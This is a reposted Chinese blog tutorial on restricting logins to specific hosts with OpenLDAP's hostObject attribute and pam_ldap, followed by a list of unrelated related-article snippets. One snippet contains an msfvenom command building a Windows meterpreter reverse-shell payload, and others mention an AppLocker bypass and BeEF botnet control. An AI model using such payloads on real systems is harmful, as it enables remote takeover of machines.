08-OpenLDAP主機控制策略

阿新 • • 發佈：2018-06-09

apt att ati servers 問控制 use min img pad

OpenLDAP主機控制策略

閱讀視圖

參考

環境準備

openldap服務端配置

openldap客戶端配置

客戶端測試登錄

故障處理

1. 參考

本文基本轉載博客openldap主機訪問控制（基於hostname）

該博主另一篇文檔，還沒測試openldap主機訪問控制（基於ip）

2. 環境準備

因為本文與其他文檔屬性不沖突，所以完全可以使用以前的環境做實驗。

3. openldap服務端配置

導入ldapns.schema方案，（hostObject類屬性）

https://github.com/openldap/openldap/blob/master/contrib/slapd-modules/nssov/ldapns.schema

cat > /etc/openldap/schema/ldapns.schema << _EOF_
# $OpenLDAP$
# $Id: ldapns.schema,v 1.3 2009-10-01 19:17:20 tedcheng Exp $
# LDAP Name Service Additional Schema
# http://www.iana.org/assignments/gssapi-service-names

#
# Not part of the distribution: this is a workaround!
#

attributetype ( 1.3.6.1.4.1.5322.17.2.1 NAME ‘authorizedService‘
        DESC ‘IANA GSS-API authorized service name‘
        EQUALITY caseIgnoreMatch
        SYNTAX 1.3.6.1.4.1.1466.115.121.1.15{256} )

attributetype ( 1.3.6.1.4.1.5322.17.2.2 NAME ‘loginStatus‘
        DESC ‘Currently logged in sessions for a user‘
        EQUALITY caseIgnoreMatch
        SUBSTR caseIgnoreSubstringsMatch
        ORDERING caseIgnoreOrderingMatch
        SYNTAX OMsDirectoryString )

objectclass ( 1.3.6.1.4.1.5322.17.1.1 NAME ‘authorizedServiceObject‘
        DESC ‘Auxiliary object class for adding authorizedService attribute‘
        SUP top
        AUXILIARY
        MAY authorizedService )

objectclass ( 1.3.6.1.4.1.5322.17.1.2 NAME ‘hostObject‘
        DESC ‘Auxiliary object class for adding host attribute‘
        SUP top
        AUXILIARY
        MAY host )

objectclass ( 1.3.6.1.4.1.5322.17.1.3 NAME ‘loginStatusObject‘
        DESC ‘Auxiliary object class for login status attribute‘
        SUP top
        AUXILIARY
        MAY loginStatus )
_EOF_

復制到/etc/openldap/schema/ldapns.schema

配置slapd.conf配置文件

include         /etc/openldap/schema/ldapns.schema
include         /etc/openldap/schema/dyngroup.schema

modulepath /usr/lib64/openldap
moduleload dynlist.la

overlay dynlist
dynlist-attrset inetOrgPerson labeledURI

rm -rf /etc/openldap/slapd.d/*
slaptest -f /etc/openldap/slapd.conf -F /etc/openldap/slapd.d
chown -R ldap:ldap /etc/openldap/slapd.d
systemctl restart slapd

驗證服務端是否正常加載

定義主機列表組

cat << _EOF_ | ldapadd -x -W -H ldapi:/// -D cn=Manager,dc=gdy,dc=com
dn: ou=servers,dc=gdy,dc=com
objectClass: organizationalUnit
ou: servers

dn: ou=apphost,ou=servers,dc=gdy,dc=com
objectClass: organizationalUnit
objectClass: hostObject
ou: apphost
host: test01.gdy.com

dn: ou=dbhost,ou=servers,dc=gdy,dc=com
objectClass: organizationalUnit
objectClass: hostObject
ou: dbhost
host: test02.gdy.com
_EOF_

定義用戶

cat << _EOF_ | ldapadd -x -W -H ldapi:/// -D cn=Manager,dc=gdy,dc=com
dn: uid=lisi,ou=people,dc=gdy,dc=com
objectClass: posixAccount
objectClass: shadowAccount
objectClass: person
objectClass: inetOrgPerson
objectClass: hostObject
cn: lisi
sn: lisi
uid: lisi
userPassword: {CRYPT}$6$AgFUbww9$Pa70MIDhUT2z3.Sg83VRnWnaDRubTHJsSxYMzbD3LQlMmXX0VeqHRHd2usrJbId.oFOeoMKi3GC60qjIHUKqK.
uidNumber: 10006
gidNumber: 10010
gecos: App Manager
homeDirectory: /home/lisi
loginShell: /bin/bash
shadowLastChange: 15000
shadowMin: 0
shadowMax: 999999
shadowWarning: 7
shadowExpire: -1
mobile: 13900001001
mail: [email protected]
labeledURI: ldap:///ou=apphost,ou=servers,dc=gdy,dc=com?host
_EOF_

cat << _EOF_ | ldapadd -x -W -H ldapi:/// -D cn=Manager,dc=gdy,dc=com
dn: uid=zhangsan,ou=people,dc=gdy,dc=com
objectClass: posixAccount
objectClass: shadowAccount
objectClass: person
objectClass: inetOrgPerson
objectClass: hostObject
cn: zhangsan
sn: zhangsan
uid: zhangsan
userPassword: {CRYPT}$6$0hM3RIS/$omCj0x/ggD.zy3pNNjVo80nhiYHbUvdQaBKsawBBTQ/r/KY2PD77NHDqEPgzZ1Wz2/ZiL./pL65BuNyZ1SHC41
uidNumber: 10007
gidNumber: 10011
gecos: opteam
homeDirectory: /home/zhangsan
loginShell: /bin/bash
shadowLastChange: 15000
shadowMin: 0
shadowMax: 999999
shadowWarning: 7
shadowExpire: -1
mobile: 13900001002
mail: [email protected]
labeledURI: ldap:///ou=devhost,ou=servers,dc=gdy,dc=com?host
_EOF_

4. openldap客戶端配置

定義FQDN解析, 已測試過如果不定義會登錄不成功

cat >> /etc/hosts << EOF
192.168.244.17    mldap01.gdy.com    mldap01
192.168.244.18    test01.gdy.com     test01

pam_ldap.conf參數規劃

cat >> /etc/pam_ldap.conf  << EOF
pam_check_host_attr yes
EOF

5. 客戶端測試登錄

正確實例

[root@test01 ~]# ssh [email protected]    
[email protected]‘s password: 
Last login: Fri Jun  1 16:24:12 2018 from localhost
[lisi@test01 ~]$ hostname
test01.gdy.com

失敗實例

[root@test01 ~]# ssh [email protected]
[email protected]‘s password: 
Access denied for this host
Connection closed by 127.0.0.1

如果用戶沒有配置好登錄屬性，服務器基本就全部登錄不了。

6. 故障處理

PS1變量失效，錯誤如下

[root@test01 home]# ssh [email protected]
[email protected]‘s password: 
Permission denied, please try again.
[email protected]‘s password: 
Last login: Fri Jun  1 14:10:53 2018 from localhost
-sh-4.1$      # 發現顯示不正常

解決方法：重新配置了一遍，發現loginShell忘記定義或者定義有問題導致loginShell屬性不存在。所以會產生如上bug。

08-OpenLDAP主機控制策略

apt att ati servers 問控制 use min img pad OpenLDAP主機控制策略閱讀視圖參考環境準備 openldap服務端配置 openldap客戶端配置客戶端測試登錄故障處理 1. 參考本文基本轉載博客openldap主

利用MSXSL.exe繞過AppLocker應用程序控制策略

命令 emp func 遠程 form div calc val tran 1.需要用到微軟工具MSXSL.exe，msxsl.exe是微軟用於命令行下處理XSL的一個程序，所以通過他，我們可以執行JavaScript進而執行系統命令，其下載地址為： https://www

vs2015發布項目到虛擬主機組策略阻止csc.exe程序問題

vs2015 for 解決解決問題 nbsp roslyn 報錯發布 otn 這個問題之前碰到過一次，這次又碰到，就記錄一下解決方法。這個問題的產生的原因，據說是虛擬主機沒有權限執行exe文件造成的，如果是獨立服務器的話發布就不會出現這個問題。使用VS201

ZPanel主機控制面板之學習路線

zpanelWelcome to the official ZPanel website. ZPanel is a free and complete web hosting control panel for Microsoft Windows and POSIX (Linux, UNIX and MacO

目前本博主發現，功能最好用，免費的，雲主機控制面板

控制面板 secure org 需求技術 src text left 分享圖片 vpsmate安裝需求操作系統：CentOS/Redhat 5.4 或 5.4 以上版本，32位或64位均可，推薦使用 CentOS 6.2 64位。內存大小：運行時占用約 20MB 左右的服

kali中利用Metasploit進行windows主機控制

kali msf 滲透； shellcode 網絡拓撲：1.生成shellcode:root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /

ASA防火墻學習筆記2-ACL訪問控制策略

ASA ACL ACL 訪問控制列表 ASA防火墻學習筆記2-ACL訪問控制策略

Squid 緩存服務器的緩存代理，及配置 Squid 的ACL訪問控制策略

-- inux title play 訪問 yum 常見需要 squid代理 Squid緩存服務器 Squid 是 Linux 系統中最常見的一塊開源代理服務軟件（官方網站為 http://www.squid-cache.org ），可以很好地實現HTTP、FTP、DN

新型功能強大的VPS虛擬主機控制面板：BrainyCP安裝教程

輸入管理系統主機托管 back 哥哥 -o 也有控制目前簡介 BrainyCP是一款由烏克蘭人開拓的虛擬主機管理系統，免費且超強可匹配cPanel，也有專人保護進行不按期繼續的更新，為虛擬主機托管面板供給了一個挑選。更新因為此款面板較新，言語目前僅支持俄語等，

【APUE | 08】程序控制

函式fork #include "apue.h" int glob = 6; char buf[] = "a write to stdout\n"; int main(void) { int var; int pid; var = 88;

J2EE事務併發控制策略總結

本文結合 hibernate以及JPA標準，對J2EE當前持久層設計所遇到的幾個問題進行總結：第一：事務併發訪問控制策略當前J2EE專案中，面臨的一個共同問題就是如果控制事務的併發訪問，雖然有些持久層框架已經為我們做了很多工作，但是理解原理，對於我們開發來說還是很有用處的。

H.264---位元速率控制策略

轉自：https://blog.csdn.net/yuanray/article/details/54090014 CBR（Constant Bit Rate）是以恆定位元率方式進行編碼，有Motion發生時，由於位元速率恆定，只能通過增大QP來減少碼字大小，影象質量變差，當場景靜止時，影象質量又變好，因此

H.264---碼率控制策略

maximum details iss 同時地方 ext .net https 限制轉自：https://blog.csdn.net/yuanray/article/details/54090014 CBR（Constant Bit Rate）是以恒定比特率方式進行編碼

Sybase資料庫安全性控制策略

計算機系統的安全性一直都是令開發者頭痛的問題，特別是在資料庫系統中，由於資料大量集中存放，且為眾多使用者直接共享，安全性問題更為突出。安全性問題給我們帶來的危害無須多言，世界上多家大型銀行都在不同程度上遭受到非法入侵者的襲擊，但由於商業原因，這些銀行都不願意公佈損失程

nodejs+MQTT協議實現遠端主機控制

摘抄自百度：MQTT（MessageQueuing Telemetry Transport，訊息佇列遙測傳輸）是IBM開發的一個即時通訊協議，有可能成為物聯網的重要組成部分。所謂物聯網，就是“萬物互聯”，我們的電腦、工控機、開發板什麼的也是“物體”，當然也可以加入“物聯

主機控制jmeter遠端負載機發起壓力時無法讀取引數化csv檔案資料的解決辦法

大併發壓力測試的時候，負載機成為效能瓶頸，需要發起多臺負載機對伺服器進行加壓。在做閘道器支付和籤購單上傳介面大併發時候，選擇遠端機作為負載機，發現遠端機能夠成功施加壓力，但是無法讀取本地引數化csv檔案資料（引數化方式為CSV Data Set config）。即使在遠端

[RK3288][Android6.0] GPU DVFS控制策略小結

Platform: Rockchip OS: Android 6.0 Kernel: 3.10.92 mali_device_driver 分為兩個部分 : platform_dependent_part 和 common_parts, 參見 mali_k

08-js流程控制

重復 pre 16px break rdquo 下標 htm color 語句 # js流程控制> 流程控制用於基於不同的條件來執行不同的動作。### if語句>if... else ...>if ... else if ... else...> 可

利用BeEF REST API自動化控制僵屍主機

.... app https uri 應該啟動 exception 但是 extension 本文已發布於Freebuf，屬於原創獎勵計劃，未經許可禁止轉載。 http://www.freebuf.com/articles/network/137662.html

08-OpenLDAP主機控制策略

OpenLDAP主機控制策略

閱讀視圖

1. 參考

2. 環境準備

3. openldap服務端配置

4. openldap客戶端配置

5. 客戶端測試登錄

6. 故障處理

相關推薦